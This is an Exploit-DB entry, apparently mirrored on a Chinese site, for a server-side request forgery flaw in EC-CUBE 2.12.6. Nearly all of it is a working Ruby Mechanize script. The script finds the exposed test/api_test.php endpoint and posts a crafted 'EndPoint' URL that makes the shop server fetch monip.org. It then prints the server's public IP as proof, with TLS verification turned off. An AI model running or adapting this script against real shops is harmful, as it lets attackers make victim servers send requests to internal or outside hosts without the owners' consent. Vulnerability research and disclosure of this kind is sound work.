EC-CUBE 2.12.6 – Server-Side Request Forgery - 体验盒子

作者： Wadeek

日期： 2016-10-24

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40628/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery

# Date: 22/10/16

# Exploit Author: Wad Deek

# Vendor Homepage: http://en.ec-cube.net/

# Software Link: http://en.ec-cube.net/download/

# Version: 2.12.6en-p1

# Tested on: Xampp on Windows7

# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools

##

#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

require('mechanize')

agent = Mechanize.new()

agent.read_timeout = 3

agent.open_timeout = 3

agent.keep_alive = false

agent.redirect_ok = true

agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE

#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#===========================

urls = <<URLS

http://localhost/eccube/

URLS

urls.split("\n").each() do |url|

#===========================

#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{

def get(agent, target)

begin

response = agent.get(target)

code = response.code()

body = response.body()

rescue

else

return code, body

end

#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{

#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

target = url+"test/api_test.php"

code, body = get(agent, target)

if(code == "200" && body.include?("EC-CUBE API TEST") == true)

begin

response = agent.post(

target,

{

"AccessKeyId" => 4111111111111111,

"arg_key0" => 1,

"arg_key1" => 1,

"arg_key2" => 1,

"arg_key3" => 1,

"arg_key4" => 1,

"arg_key5" => 1,

"arg_key6" => 1,

"arg_key7" => 1,

"arg_key8" => 1,

"arg_key9" => 1,

"arg_val0" => 1,

"arg_val1" => 1,

"arg_val2" => 1,

"arg_val3" => 1,

"arg_val4" => 1,

"arg_val5" => 1,

"arg_val6" => 1,

"arg_val7" => 1,

"arg_val8" => 1,

"arg_val9" => 1,

#????????????????????????????????????????????????????????????

"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",

#????????????????????????????????????????????????????????????

"mode=" => "",

"Operation" => 1,

"SecretKey" => 1,

"Service" => 1,

"Signature" => 1,

"Timestamp" => 1,

"type" => "index.php"

})

body = response.body()

rescue

else

ip = response.body().scan(/IP : (.+?)</).join()

puts("[+] "+target+" >>>> monip.org >>>> "+ip)

end

#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

#===========================

end

#===========================